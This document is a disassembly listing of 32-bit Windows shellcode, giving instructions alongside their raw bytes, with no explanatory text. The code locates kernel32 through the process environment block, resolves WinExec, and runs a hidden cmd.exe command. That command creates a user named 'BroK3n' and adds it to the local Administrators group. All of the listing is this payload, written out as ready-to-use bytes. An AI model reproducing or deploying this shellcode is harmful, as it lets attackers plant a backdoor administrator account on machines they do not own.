0x0        xor edx, edx                        \x31\xd2                  1.        
0x2        mov dl, 0x30                        \xb2\x30                  .0        
0x4        mov edx, dword ptr fs:[edx]         \x64\x8b\x12              d..       
0x7        mov edx, dword ptr [edx + 0xc]      \x8b\x52\x0c              .R.       
0xa        mov edx, dword ptr [edx + 0x1c]     \x8b\x52\x1c              .R.       
     label_0xd:
0xd        mov eax, dword ptr [edx + 8]        \x8b\x42\x08              .B.       
0x10       mov esi, dword ptr [edx + 0x20]     \x8b\x72\x20              .r        
0x13       mov edx, dword ptr [edx]            \x8b\x12                  ..        
0x15       cmp byte ptr [esi + 0xc], 0x33      \x80\x7e\x0c\x33          .~.3      
0x19       jne 0xd                             \x75\xf2                  u.        

0x1b       mov edi, eax                        \x89\xc7                  ..        
0x1d       add edi, dword ptr [eax + 0x3c]     \x03\x78\x3c              .x<       
0x20       mov edx, dword ptr [edi + 0x78]     \x8b\x57\x78              .Wx       
0x23       add edx, eax                        \x01\xc2                  ..        
0x25       mov edi, dword ptr [edx + 0x20]     \x8b\x7a\x20              .z        
0x28       add edi, eax                        \x01\xc7                  ..        
0x2a       xor ebp, ebp                        \x31\xed                  1.        
0x2c       mov esi, dword ptr [edi + ebp*4]    \x8b\x34\xaf              .4.       
0x2f       add esi, eax                        \x01\xc6                  ..        
0x31       inc ebp                             \x45                      E         
0x32       db 0x81                             \x81                      .         
0x33       >WinEu ; string                    \x3e\x57\x69\x6e\x45\x75            
0x39       mov edi, dword ptr [edx + 0x24]     \xf2\x8b\x7a\x24          ..z$      
0x3d       add edi, eax                        \x01\xc7                  ..        
0x3f       mov bp, word ptr [edi + ebp*2]      \x66\x8b\x2c\x6f          f.,o      
0x43       mov edi, dword ptr [edx + 0x1c]     \x8b\x7a\x1c              .z.       
0x46       add edi, eax                        \x01\xc7                  ..        
0x48       mov edi, dword ptr [edi + ebp*4 - 4] \x8b\x7c\xaf\xfc          .|..      
0x4c       add edi, eax                        \x01\xc7                  ..        
0x4e       push 0x16e334b                      \x68\x4b\x33\x6e\x01      hK3n.     
0x53       h Broh/ADDhors htrathinish Admhrouphcalght loh& nehDD &hn /AhroK3h3n BhBroKhser het uh/c nhexe hcmd. ; string\x68\x20\x42\x72\x6f\x68\x2f\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e          
0xb7       mov ebp, esp                        \x89\xe5                  ..        
0xb9       dec byte ptr [ebp + 0x53]           \xfe\x4d\x53              .MS       
0xbc       xor eax, eax                        \x31\xc0                  1.        
0xbe       push eax                            \x50                      P         
0xbf       push ebp                            \x55                      U         
0xc0       call edi                            \xff\xd7                  ..        
